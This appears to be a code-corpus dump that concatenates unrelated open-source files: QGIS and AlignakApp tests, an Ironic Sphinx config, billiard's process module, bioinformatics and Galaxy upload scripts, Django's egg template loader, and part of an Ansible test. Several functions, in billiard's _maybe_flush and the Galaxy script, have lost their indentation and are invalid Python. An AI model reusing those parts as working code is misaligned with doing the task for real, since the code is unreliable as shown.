        shape = QgsLayoutItemPolygon(p, l)

        props = {}
        props["color"] = "green"
        props["style"] = "solid"
        props["style_border"] = "solid"
        props["color_border"] = "red"
        props["width_border"] = "6.0"
        props["joinstyle"] = "miter"

        style = QgsFillSymbol.createSimple(props)
        shape.setSymbol(style)

        # scene bounding rect should include symbol outline
        bounds = shape.sceneBoundingRect()
        self.assertEqual(bounds.left(), 47.0)
        self.assertEqual(bounds.right(), 203.0)
        self.assertEqual(bounds.top(), 7.0)
        self.assertEqual(bounds.bottom(), 103.0)

        # rectWithFrame should include symbol outline too
        bounds = shape.rectWithFrame()
        self.assertEqual(bounds.left(), -3.0)
        self.assertEqual(bounds.right(), 153.0)
        self.assertEqual(bounds.top(), -3.0)
        self.assertEqual(bounds.bottom(), 93.0)

    def testClipPath(self):
        """Clip path must follow node edits and emit clipPathChanged."""
        pr = QgsProject()
        l = QgsLayout(pr)

        p = QPolygonF()
        p.append(QPointF(50.0, 30.0))
        p.append(QPointF(100.0, 10.0))
        p.append(QPointF(200.0, 100.0))
        shape = QgsLayoutItemPolygon(p, l)

        # must be a closed polygon, in scene coordinates!
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 50 30))')
        self.assertTrue(int(shape.itemFlags() & QgsLayoutItem.FlagProvidesClipPath))

        spy = QSignalSpy(shape.clipPathChanged)
        self.assertTrue(shape.addNode(QPointF(150, 110), False))
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 150 110, 50 30))')
        self.assertEqual(len(spy), 1)

        shape.removeNode(3)
        self.assertEqual(len(spy), 2)
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 200 100, 50 30))')

        shape.moveNode(2, QPointF(180, 100))
        self.assertEqual(len(spy), 3)
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((50 30, 100 10, 180 100, 50 30))')

        shape.setNodes(p)
        self.assertEqual(len(spy), 4)
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((100 40, 150 20, 250 110, 100 40))')

        shape.attemptSetSceneRect(QRectF(30, 10, 100, 200))
        self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((30 30, 80 10, 180 100, 30 30))')

        # bit gross - this needs fixing in the item. It shouldn't rely on a draw operation to update the
        # path as a result of a move/resize
        im = QImage()
        p = QPainter(im)
        rc = QgsLayoutUtils.createRenderContextForLayout(l, p)
        shape.draw(QgsLayoutItemRenderContext(rc))
        p.end()
        self.assertEqual(len(spy), 5)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
supermari0/ironic | doc/source/conf.py | 8 | 2542 | # -*- coding: utf-8 -*-
#
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
              'sphinx.ext.viewcode',
              'sphinxcontrib.httpdomain',
              'sphinxcontrib.pecanwsme.rest',
              'wsmeext.sphinxext',
              'oslosphinx',
              ]

# WSME REST API docs are rendered for the REST+JSON protocol only.
wsme_protocols = ['restjson']

# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Ironic'
copyright = u'OpenStack Foundation'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from ironic import version as ironic_version
# The full version, including alpha/beta/rc tags.
release = ironic_version.version_info.release_string()
# The short X.Y version.
version = ironic_version.version_info.version_string()

# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['ironic.']

# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# -- Options for HTML output --------------------------------------------------

# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
#html_theme_path = ["."]
#html_theme = '_theme'
#html_static_path = ['_static']

# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
    (
        'index',
        '%s.tex' % project,
        u'%s Documentation' % project,
        u'OpenStack Foundation',
        'manual'
    ),
]
| apache-2.0 |
flaviogrossi/billiard | billiard/process.py | 2 | 10580 | #
# Module providing the `Process` class which emulates `threading.Thread`
#
# multiprocessing/process.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import os
import sys
import signal
import itertools
import logging
import threading
from _weakrefset import WeakSet
from multiprocessing import process as _mproc
from .five import items, string_t
# Remember the working directory at import time; os.getcwd() can fail (for
# example, the directory was removed), in which case no directory is recorded.
try:
    ORIGINAL_DIR = os.path.abspath(os.getcwd())
except OSError:
    ORIGINAL_DIR = None

# Public API of this module.
__all__ = ['BaseProcess', 'Process', 'current_process', 'active_children']
#
# Public functions
#
def current_process():
    """Return the process object representing the calling process."""
    return _current_process
def _set_current_process(process):
    # Keep billiard's notion of the current process in sync with the stdlib
    # multiprocessing module, so code using either package agrees.
    global _current_process
    _current_process = _mproc._current_process = process
def _cleanup():
    # check for processes which have finished
    # Iterate over a snapshot of _children since we mutate the set while looping.
    for p in list(_children):
        if p._popen.poll() is not None:
            _children.discard(p)
def _maybe_flush(f):
try:
f.flush()
except (AttributeError, EnvironmentError, NotImplementedError):
pass
def active_children(_cleanup=_cleanup):
    '''
    Return list of process objects corresponding to live child processes
    '''
    # ``_cleanup`` is bound as a default argument so it remains reachable
    # during interpreter shutdown, when module globals may already be cleared.
    try:
        _cleanup()
    except TypeError:
        # called after gc collect so _cleanup does not exist anymore
        return []
    return list(_children)
class BaseProcess(object):
    '''
    Process objects represent activity that is run in a separate process

    The class is analagous to `threading.Thread`
    '''

    def _Popen(self):
        # Overridden by concrete subclasses with the start-method specific
        # Popen implementation used to actually launch the child.
        raise NotImplementedError()

    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs={}, daemon=None, **_kw):
        assert group is None, 'group argument must be None for now'
        count = next(_process_counter)
        # Identity is the parent's identity tuple plus this child's index,
        # e.g. (1, 2) for the second child of the first child of the main process.
        self._identity = _current_process._identity + (count, )
        # Children inherit a copy of the parent's config (authkey, daemon flag...).
        self._config = _current_process._config.copy()
        self._parent_pid = os.getpid()
        self._popen = None
        self._target = target
        self._args = tuple(args)
        self._kwargs = dict(kwargs)
        self._name = (
            name or type(self).__name__ + '-' +
            ':'.join(str(i) for i in self._identity)
        )
        if daemon is not None:
            self.daemon = daemon
        if _dangling is not None:
            # For debug/leak testing: track every process object ever created.
            _dangling.add(self)

    def run(self):
        '''
        Method to be run in sub-process; can be overridden in sub-class
        '''
        if self._target:
            self._target(*self._args, **self._kwargs)

    def start(self):
        '''
        Start child process
        '''
        assert self._popen is None, 'cannot start a process twice'
        assert self._parent_pid == os.getpid(), \
            'can only start a process object created by current process'
        assert not _current_process._config.get('daemon'), \
            'daemonic processes are not allowed to have children'
        # Reap any already-finished children before adding a new one.
        _cleanup()
        self._popen = self._Popen(self)
        self._sentinel = self._popen.sentinel
        _children.add(self)

    def terminate(self):
        '''
        Terminate process; sends SIGTERM signal or uses TerminateProcess()
        '''
        self._popen.terminate()

    def join(self, timeout=None):
        '''
        Wait until child process terminates
        '''
        assert self._parent_pid == os.getpid(), 'can only join a child process'
        assert self._popen is not None, 'can only join a started process'
        res = self._popen.wait(timeout)
        if res is not None:
            # Process has exited; stop tracking it as a live child.
            _children.discard(self)

    def is_alive(self):
        '''
        Return whether process is alive
        '''
        if self is _current_process:
            return True
        assert self._parent_pid == os.getpid(), 'can only test a child process'
        if self._popen is None:
            return False
        self._popen.poll()
        return self._popen.returncode is None

    def _is_alive(self):
        # Internal variant without the parent-pid assertion.
        if self._popen is None:
            return False
        return self._popen.poll() is None

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, name):  # noqa
        assert isinstance(name, string_t), 'name must be a string'
        self._name = name

    @property
    def daemon(self):
        '''
        Return whether process is a daemon
        '''
        return self._config.get('daemon', False)

    @daemon.setter  # noqa
    def daemon(self, daemonic):
        '''
        Set whether process is a daemon
        '''
        assert self._popen is None, 'process has already started'
        self._config['daemon'] = daemonic

    @property
    def authkey(self):
        return self._config['authkey']

    @authkey.setter  # noqa
    def authkey(self, authkey):
        '''
        Set authorization key of process
        '''
        self._config['authkey'] = AuthenticationString(authkey)

    @property
    def exitcode(self):
        '''
        Return exit code of process or `None` if it has yet to stop
        '''
        if self._popen is None:
            # Not started: self._popen is None, which is the documented result.
            return self._popen
        return self._popen.poll()

    @property
    def ident(self):
        '''
        Return identifier (PID) of process or `None` if it has yet to start
        '''
        if self is _current_process:
            return os.getpid()
        else:
            return self._popen and self._popen.pid

    # PID and ident are synonyms, as for threading.Thread.
    pid = ident

    @property
    def sentinel(self):
        '''
        Return a file descriptor (Unix) or handle (Windows) suitable for
        waiting for process termination.
        '''
        try:
            return self._sentinel
        except AttributeError:
            raise ValueError("process not started")

    @property
    def _children(self):
        # compat for 2.7
        return _children

    def __repr__(self):
        # Describe the process state as precisely as observable from here.
        if self is _current_process:
            status = 'started'
        elif self._parent_pid != os.getpid():
            status = 'unknown'
        elif self._popen is None:
            status = 'initial'
        else:
            if self._popen.poll() is not None:
                status = self.exitcode
            else:
                status = 'started'
        if type(status) is int:
            if status == 0:
                status = 'stopped'
            else:
                # Negative exit codes map to signal names (e.g. SIGKILL).
                status = 'stopped[%s]' % _exitcode_to_name.get(status, status)
        return '<%s(%s, %s%s)>' % (type(self).__name__, self._name,
                                   status, self.daemon and ' daemon' or '')

    ##
    def _bootstrap(self):
        # Entry point executed inside the freshly created child process.
        # Resets per-process globals, repairs state broken by fork (stdin,
        # logging locks), runs self.run() and returns the exit code.
        from . import util, context
        global _current_process, _process_counter, _children

        try:
            # NOTE(review): assumes self._start_method was set by the
            # start-method machinery before the child bootstraps.
            if self._start_method is not None:
                context._force_start_method(self._start_method)
            _process_counter = itertools.count(1)
            _children = set()
            if sys.stdin is not None:
                try:
                    sys.stdin.close()
                    sys.stdin = open(os.devnull)
                except (OSError, ValueError):
                    pass
            old_process = _current_process
            _set_current_process(self)

            # Re-init logging system.
            # Workaround for http://bugs.python.org/issue6721/#msg140215
            # Python logging module uses RLock() objects which are broken
            # after fork. This can result in a deadlock (Celery Issue #496).
            loggerDict = logging.Logger.manager.loggerDict
            logger_names = list(loggerDict.keys())
            logger_names.append(None)  # for root logger
            for name in logger_names:
                if not name or not isinstance(loggerDict[name],
                                              logging.PlaceHolder):
                    for handler in logging.getLogger(name).handlers:
                        handler.createLock()
            logging._lock = threading.RLock()

            try:
                util._finalizer_registry.clear()
                util._run_after_forkers()
            finally:
                # delay finalization of the old process object until after
                # _run_after_forkers() is executed
                del old_process
            util.info('child process %s calling self.run()', self.pid)
            try:
                self.run()
                exitcode = 0
            finally:
                util._exit_function()
        except SystemExit as exc:
            if not exc.args:
                exitcode = 1
            elif isinstance(exc.args[0], int):
                exitcode = exc.args[0]
            else:
                # sys.exit("message"): print the message and exit cleanly.
                sys.stderr.write(str(exc.args[0]) + '\n')
                _maybe_flush(sys.stderr)
                exitcode = 0 if isinstance(exc.args[0], str) else 1
        except:
            exitcode = 1
            if not util.error('Process %s', self.name, exc_info=True):
                # Logging was not possible; fall back to a raw traceback.
                import traceback
                sys.stderr.write('Process %s:\n' % self.name)
                traceback.print_exc()
        finally:
            util.info('process %s exiting with exitcode %d',
                      self.pid, exitcode)
            _maybe_flush(sys.stdout)
            _maybe_flush(sys.stderr)
        return exitcode
#
# We subclass bytes to avoid accidental transmission of auth keys over network
#
class AuthenticationString(bytes):
    """Bytes subclass whose pickling is restricted to process spawning.

    This prevents authentication keys from being accidentally serialized
    and sent over a network or written to disk.
    """

    def __reduce__(self):
        from .context import get_spawning_popen
        if get_spawning_popen() is None:
            # Only the spawn machinery may pickle an auth key.
            raise TypeError(
                'Pickling an AuthenticationString object is '
                'disallowed for security reasons')
        return AuthenticationString, (bytes(self),)
#
# Create object representing the main process
#
class _MainProcess(BaseProcess):
    """Process object representing the main (already running) process.

    It has an empty identity, no parent and no Popen handle; its config
    seeds the authkey and semaphore prefix inherited by all children.
    """

    def __init__(self):
        self._identity = ()
        self._name = 'MainProcess'
        self._parent_pid = None
        self._popen = None
        self._config = {'authkey': AuthenticationString(os.urandom(32)),
                        'semprefix': '/mp'}
# Module-level state: the current process starts out as the main process,
# with a fresh child counter and no children.
_current_process = _MainProcess()
_process_counter = itertools.count(1)
_children = set()
del _MainProcess

# Default concrete Process class; platform modules may rebind this.
Process = BaseProcess

#
# Give names to some return codes
#
_exitcode_to_name = {}
# Map negative exit codes (killed by signal N) to the signal's name.
for name, signum in items(signal.__dict__):
    if name[:3] == 'SIG' and '_' not in name:
        _exitcode_to_name[-signum] = name

# For debug and leak testing
_dangling = WeakSet()
| bsd-3-clause |
McIntyre-Lab/papers | newman_t1d_cases_2017/scripts/bwa_sam_parse.py | 1 | 2304 | #!/usr/bin/env python
"""Parse a SAM file produced by BWA-MEM and log alignment counts/percentages."""
import argparse

# Parse command line arguments
parser = argparse.ArgumentParser(description='Parse sam file to get alignment counts.')
parser.add_argument('-sam', '--sam_file', dest='sam', action='store', required=True, help='A Sam file to parse [Required]')
parser.add_argument('-o', '--out', dest='out', action='store', required=True, help='Output file for alignment log [Required]')
args = parser.parse_args()

# Collect the bitwise flag (second column) of every record in the SAM file.
flags = []
with open(args.sam, 'r') as sam:
    for record in sam.readlines():
        flags.append(record.split('\t')[1])

# Flag values below are based on BWA paired-end sam output; they may not be
# the same for other aligners (see bwa_sam_parse_se.py for single-end data).
UNALIGNED = ('77', '141', '181', '121', '133', '117', '69')
ALIGNED = ('99', '73', '185', '147', '83', '163', '97', '137', '145', '81',
           '161', '177', '113', '65', '129')
AMBIGUOUS = ('337', '417', '369', '433', '353', '401', '371', '355', '403',
             '419', '339', '387', '385', '323', '435', '321')

unaln = sum(flags.count(flag) for flag in UNALIGNED)
aln = sum(flags.count(flag) for flag in ALIGNED)
ambig = sum(flags.count(flag) for flag in AMBIGUOUS)
total = unaln + aln

# Get percentages
percent_aln = float(aln) / total * 100
percent_unaln = float(unaln) / total * 100
percent_ambig = float(ambig) / total * 100

# Write the counts to the output.
with open(args.out, 'w') as dataout:
    dataout.write('Total reads '+str(total)+'\nAligned '+str(aln)+'\nUnaligned '+str(unaln)+'\nAmbiguous '+str(ambig)+'\nPercent aligned '+str(percent_aln)+'\nPercent unaligned '+str(percent_unaln)+'\nPercent ambiguous '+str(percent_ambig))
| lgpl-3.0 |
Alignak-monitoring-contrib/alignak-app | test/test_panel_widget.py | 1 | 9176 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Matthieu Estrada, ttamalfor@gmail.com
#
# This file is part of (AlignakApp).
#
# (AlignakApp) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (AlignakApp) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (AlignakApp). If not, see <http://www.gnu.org/licenses/>.
import sys
import unittest2
from PyQt5.Qt import QApplication, QItemSelectionModel
from alignak_app.utils.config import settings
from alignak_app.backend.datamanager import data_manager
from alignak_app.items.host import Host
from alignak_app.items.service import Service
from alignak_app.qobjects.panel import PanelQWidget
class TestPanelQWidget(unittest2.TestCase):
    """
    Test the PanelQWidget class.
    """

    settings.init_config()

    # Host data test
    # Ten fake UNREACHABLE hosts, '_id0'..'_id9', used to seed the data manager.
    host_list = []
    for i in range(0, 10):
        host = Host()
        host.create(
            '_id%d' % i,
            {
                'name': 'host%d' % i,
                'alias': 'Host %d' % i,
                '_id': '_id%d' % i,
                'ls_downtimed': False,
                'ls_acknowledged': False,
                'ls_state': 'UNREACHABLE',
                'ls_output': 'output host %d' % i,
                'ls_last_check': '',
                '_realm': '59c4e38535d17b8dcb0bed42',
                'address': '127.0.0.1',
                'business_impact': '2',
                'notes': 'host notes',
                'passive_checks_enabled': False,
                'active_checks_enabled': True,
                '_overall_state_id': 1,
                'customs': {}
            },
            'host%d' % i
        )
        host_list.append(host)

    # Service data test
    # Ten fake CRITICAL services, one per fake host above.
    service_list = []
    for i in range(0, 10):
        service = Service()
        service.create(
            '_id%d' % i,
            {
                'name': 'service%d' % i,
                'alias': 'Service %d' % i,
                'host': '_id%d' % i,
                '_id': '_id%d' % i,
                'ls_acknowledged': False,
                'ls_downtimed': False,
                'ls_state': 'CRITICAL',
                'ls_output': 'output host %d' % i,
                'aggregation': 'disk',
                '_overall_state_id': 4,
                'passive_checks_enabled': False,
                'active_checks_enabled': True,
            },
            'service%d' % i
        )
        service_list.append(service)

    @classmethod
    def setUpClass(cls):
        """Create QApplication"""
        # A QApplication may already exist when the whole suite runs; ignore
        # the failure in that case.
        try:
            cls.app = QApplication(sys.argv)
        except:
            pass

    def test_create_widget(self):
        """Initialize PanelQWidget"""
        # Add problems
        data_manager.update_database('host', self.host_list)
        data_manager.database['problems'] = []
        for item in self.host_list:
            data_manager.database['problems'].append(item)
        for item in self.service_list:
            data_manager.database['problems'].append(item)

        for item in self.host_list:
            assert 'host' in item.item_type

        under_test = PanelQWidget()

        # Before initialize(): sub-widgets exist but no hostnames are known.
        self.assertIsNotNone(under_test.layout)
        self.assertIsNotNone(under_test.dashboard_widget)
        self.assertIsNotNone(under_test.synthesis_widget)
        self.assertIsNotNone(under_test.spy_widget)
        self.assertFalse(under_test.hostnames_list)

        under_test.initialize()

        # After initialize(): the hostnames list is filled from the database.
        self.assertIsNotNone(under_test.layout)
        self.assertIsNotNone(under_test.dashboard_widget)
        self.assertIsNotNone(under_test.synthesis_widget)
        self.assertIsNotNone(under_test.spy_widget)
        self.assertEqual(
            ['host0', 'host1', 'host2', 'host3', 'host4', 'host5',
             'host6', 'host7', 'host8', 'host9'],
            under_test.hostnames_list
        )

    def test_spy_host(self):
        """Panel Add Spy Host"""
        # init_event_widget()
        under_test = PanelQWidget()
        under_test.initialize()

        # Host is not in hostname_list
        under_test.synthesis_widget.line_search.setText('no_host')
        under_test.spy_host()

        spy_index = under_test.get_tab_order().index('s')
        # Spying an unknown host must not disable the button nor rename the tab.
        self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
        self.assertEqual('Spy Hosts', under_test.tab_widget.tabText(spy_index))

        # Host Id is not added in spied_hosts of SpyQWidget.SpyQListWidget
        self.assertFalse('_id0' in under_test.spy_widget.spy_list_widget.spied_hosts)

    def test_update_panels(self):
        """Update QTabPanel Problems"""
        data_manager.database['problems'] = []
        data_manager.update_database('host', self.host_list)
        for item in self.host_list:
            data_manager.database['problems'].append(item)
        for item in self.service_list:
            data_manager.database['problems'].append(item)

        under_test = PanelQWidget()
        under_test.initialize()

        # 20 problems for CRITICAL services and UNREACHABLE hosts
        problems_index = under_test.get_tab_order().index('p')
        self.assertEqual('Problems (20)', under_test.tab_widget.tabText(problems_index))

        # Remove a service from problems
        data_manager.database['problems'].remove(self.service_list[0])

        under_test.tab_widget.widget(problems_index).update_problems_data()

        # There are only 9 services in CRITICAL condition
        self.assertEqual('Problems (19)', under_test.tab_widget.tabText(problems_index))

    def test_display_host(self):
        """Display Host in Panel"""
        under_test = PanelQWidget()
        under_test.initialize()

        self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
        self.assertEqual(
            'Host Synthesis',
            under_test.tab_widget.tabText(
                under_test.tab_widget.indexOf(under_test.synthesis_widget))
        )

        under_test.display_host()

        # With an empty search, only the hint widget is visible.
        # Host is not spied, so button is enable
        self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
        # No customs, so button is not enabled
        self.assertTrue(under_test.synthesis_widget.host_widget.customs_btn.isEnabled())
        # Host and Services Qwidgets are hidden
        self.assertTrue(under_test.synthesis_widget.host_widget.isHidden())
        self.assertTrue(under_test.synthesis_widget.services_widget.isHidden())
        # Hint QWidget is shown
        self.assertFalse(under_test.synthesis_widget.hint_widget.isHidden())
        self.assertEqual(
            'Host Synthesis',
            under_test.tab_widget.tabText(
                under_test.tab_widget.indexOf(under_test.synthesis_widget))
        )

        under_test.synthesis_widget.line_search.setText(self.host_list[0].name)
        under_test.display_host()

        # Searching an existing host shows its widgets and renames the tab.
        # Host is not spied, so button is enable
        self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
        # No customs, so button is not enabled
        self.assertFalse(under_test.synthesis_widget.host_widget.customs_btn.isEnabled())
        # Host and Services Qwidgets are displayed
        self.assertFalse(under_test.synthesis_widget.host_widget.isHidden())
        self.assertFalse(under_test.synthesis_widget.services_widget.isHidden())
        # Hint QWidget is hidden
        self.assertTrue(under_test.synthesis_widget.hint_widget.isHidden())
        self.assertEqual(
            'Host "Host 0"',
            under_test.tab_widget.tabText(
                under_test.tab_widget.indexOf(under_test.synthesis_widget))
        )

    def test_set_host_from_problems(self):
        """Set Host in Panel from Problems QWidget"""
        under_test = PanelQWidget()
        under_test.initialize()

        self.assertEqual('', under_test.synthesis_widget.line_search.text())
        self.assertIsNone(under_test.problems_widget.get_current_user_role_item())

        # Make an item as current in problems table
        under_test.problems_widget.problems_table.update_view({'problems': [self.host_list[8]]})
        index_test = under_test.problems_widget.problems_table.model().index(0, 0)
        under_test.problems_widget.problems_table.selectionModel().setCurrentIndex(
            index_test,
            QItemSelectionModel.SelectCurrent
        )

        self.assertIsNotNone(under_test.problems_widget.get_current_user_role_item())
        self.assertEqual('', under_test.synthesis_widget.line_search.text())

        under_test.set_host_from_problems()

        # Host is set in line search
        self.assertEqual('host8', under_test.synthesis_widget.line_search.text())
| agpl-3.0 |
golharam/rgtools | scripts/galaxy/api/addFilesToLibrary.py | 1 | 4458 | #!/usr/bin/env python
"""
Author: Ryan Golhar <ryan.golhar@bms.com>
Date: 06/24/15
This script adds readme.txt, *.fastq.gz to a Galaxy Library
Usage: addFilesToLibrary [-h] [--api-key <API_KEY>] [--api-url <API_URL>] <path of directory to scan> <library_name>
"""
import ConfigParser
import os
import argparse
import sys
from common import display
from common import submit
import re
from bioblend import galaxy
import time
# Set to 1 to print the parsed command-line settings before doing any work.
_debug = 1
# Running total of files linked into the library by uploadFile().
_filesUploaded = 0
def uploadFile(fileToUpload, galaxyInstance, galaxyLibrary, destFolder = '/'):
# Note: Right now, Galaxy strips .gz files of .gz. So when searching of files, make sure to compare to data_set file_name
libraryContents = galaxyInstance.libraries.show_library(galaxyLibrary['id'], contents = True)
# Get the folder
galaxyFolder_id = None
for libraryEntry in libraryContents:
if libraryEntry['name'] == destFolder and libraryEntry['type'] == 'folder':
galaxyFolder_id = libraryEntry['id']
break
# Make sure the file doesn't exist in the destFolder
for libraryEntry in libraryContents:
if libraryEntry['type'] == 'file':
dataset = galaxyInstance.libraries.show_dataset(galaxyLibrary['id'], libraryEntry['id'])
if fileToUpload == dataset['file_name']:
print "File already exists in library: %s. Skipping." % libraryEntry['name']
return
# Upload file
if os.access(fileToUpload, os.R_OK):
print "Uploading file %s -> %s:%s" % (fileToUpload, galaxyLibrary['name'], destFolder)
result = galaxyInstance.libraries.upload_from_galaxy_filesystem(galaxyLibrary['id'], fileToUpload, galaxyFolder_id, file_type='fastq', link_data_only='link_to_files')
print result
global _filesUploaded
_filesUploaded = _filesUploaded+1
else:
print "%s is not accessbile" % fileToUpload
def main():
if _debug == 1:
print 'Galaxy API URL: %s' % args.api_url
print 'Galaxy API Key: %s' % args.api_key
print 'Path to Upload: %s' % args.pathToUpload
print 'Library: %s' % args.library
# 1. Make sure Galaxy library exist
# 2. Scan path for readme.txt and *.fastq.gz and upload files to library
# 1.
gi = galaxy.GalaxyInstance(url=args.api_url, key=args.api_key)
galaxyLibraries = gi.libraries.get_libraries(name=args.library, deleted=False)
for library in galaxyLibraries:
if library['deleted'] == False:
galaxyLibrary = library
if galaxyLibrary == None:
print "library %s not found" % args.library
exit(-1)
# 2. Scan the path for readme.txt, *.fastq.gz, *.fq.gz and upload to library
if os.path.isfile(args.pathToUpload):
uploadFile(args.pathToUpload, gi, galaxyLibrary)
elif os.path.isdir(args.pathToUpload):
# if args.pathToUpload.endswith('/'):
# Upload files in directory to dest
# 3. Scan the directory for *.fastq.gz and add each file
for root, dirs, files in os.walk(args.pathToUpload):
#for dir in dirs:
for file in files:
if (file.endswith('.gz')):
fileToUpload = os.path.join(root, file)
uploadFile(fileToUpload, gi, galaxyLibrary)
# else:
# Upload directory and contents
# print "make directory and upload to directory"
print "Uploaded %s files." % _filesUploaded
if __name__ == '__main__':
    # Get defaults from ~/.galaxy.ini
    config = ConfigParser.RawConfigParser()
    if os.path.exists(os.path.expanduser("~/.galaxy.ini")):
        config.read(os.path.expanduser("~/.galaxy.ini"))
        _api_key = config.get('default', 'api_key')
        _api_url = config.get('default', 'api_url')
    else:
        _api_key = None
        _api_url = None

    # Parse Command-Line Arguments; --api-url/--api-key fall back to the
    # values read from ~/.galaxy.ini above.
    parser = argparse.ArgumentParser()
    parser.add_argument('--api-url', help="Galaxy URL", default=_api_url)
    parser.add_argument('--api-key', help="User's Galaxy Key", default=_api_key)
    parser.add_argument('pathToUpload', help="File or Directory to upload")
    parser.add_argument('library', help="Name of Library to add data to")
    args = parser.parse_args()

    # Do work
    main()
| lgpl-3.0 |
areski/django | django/template/loaders/eggs.py | 145 | 2388 | # Wrapper for loading templates from eggs via pkg_resources.resource_string.
from __future__ import unicode_literals
import warnings
from django.apps import apps
from django.template import Origin, TemplateDoesNotExist
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from .base import Loader as BaseLoader
# pkg_resources is optional (setuptools); Loader.__init__ raises if missing.
try:
    from pkg_resources import resource_string
except ImportError:
    resource_string = None

# The whole egg loader is deprecated; warn once at import time.
warnings.warn('The egg template loader is deprecated.', RemovedInDjango20Warning)
class EggOrigin(Origin):
    """Template origin that also records the app and package it came from."""

    def __init__(self, app_name, pkg_name, *args, **kwargs):
        self.app_name, self.pkg_name = app_name, pkg_name
        super(EggOrigin, self).__init__(*args, **kwargs)
class Loader(BaseLoader):
    """Template loader reading templates out of installed eggs."""

    def __init__(self, engine):
        if resource_string is None:
            # pkg_resources failed to import above.
            raise RuntimeError("Setuptools must be installed to use the egg loader")
        super(Loader, self).__init__(engine)

    def get_contents(self, origin):
        """Return the template text for an EggOrigin, or raise TemplateDoesNotExist."""
        try:
            source = resource_string(origin.app_name, origin.pkg_name)
        except Exception:
            # Any pkg_resources failure means the template is not in this egg.
            raise TemplateDoesNotExist(origin)
        if six.PY2:
            # resource_string returns bytes; decode on Python 2 only.
            source = source.decode(self.engine.file_charset)
        return source

    def get_template_sources(self, template_name):
        """Yield one EggOrigin per installed app for *template_name*."""
        pkg_name = 'templates/' + template_name
        for app_config in apps.get_app_configs():
            yield EggOrigin(
                app_name=app_config.name,
                pkg_name=pkg_name,
                name="egg:%s:%s" % (app_config.name, pkg_name),
                template_name=template_name,
                loader=self,
            )

    def load_template_source(self, template_name, template_dirs=None):
        """
        Loads templates from Python eggs via pkg_resource.resource_string.

        For every installed app, it tries to get the resource (app, template_name).

        Deprecated in favor of get_template()/get_contents().
        """
        warnings.warn(
            'The load_template_sources() method is deprecated. Use '
            'get_template() or get_contents() instead.',
            RemovedInDjango20Warning,
        )
        for origin in self.get_template_sources(template_name):
            try:
                return self.get_contents(origin), origin.name
            except TemplateDoesNotExist:
                pass
        raise TemplateDoesNotExist(template_name)
| bsd-3-clause |
nitzmahone/ansible | test/units/modules/network/ovs/test_openvswitch_db.py | 44 | 6197 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.ovs import openvswitch_db
from units.modules.utils import set_module_args
from .ovs_module import TestOpenVSwitchModule, load_fixture
# Maps each test method name to the sequence of (rc, stdout_fixture, stderr)
# triples fed to AnsibleModule.run_command, in call order: first the ovs-vsctl
# "get" that reads current state, then the state-changing command (if any).
test_name_side_effect_matrix = {
    'test_openvswitch_db_absent_idempotent': [
        (0, 'openvswitch_db_disable_in_band_missing.cfg', None),
        (0, None, None)],
    'test_openvswitch_db_absent_removes_key': [
        (0, 'openvswitch_db_disable_in_band_true.cfg', None),
        (0, None, None)],
    'test_openvswitch_db_present_idempotent': [
        (0, 'openvswitch_db_disable_in_band_true.cfg', None),
        (0, None, None)],
    'test_openvswitch_db_present_adds_key': [
        (0, 'openvswitch_db_disable_in_band_missing.cfg', None),
        (0, None, None)],
    'test_openvswitch_db_present_updates_key': [
        (0, 'openvswitch_db_disable_in_band_true.cfg', None),
        (0, None, None)],
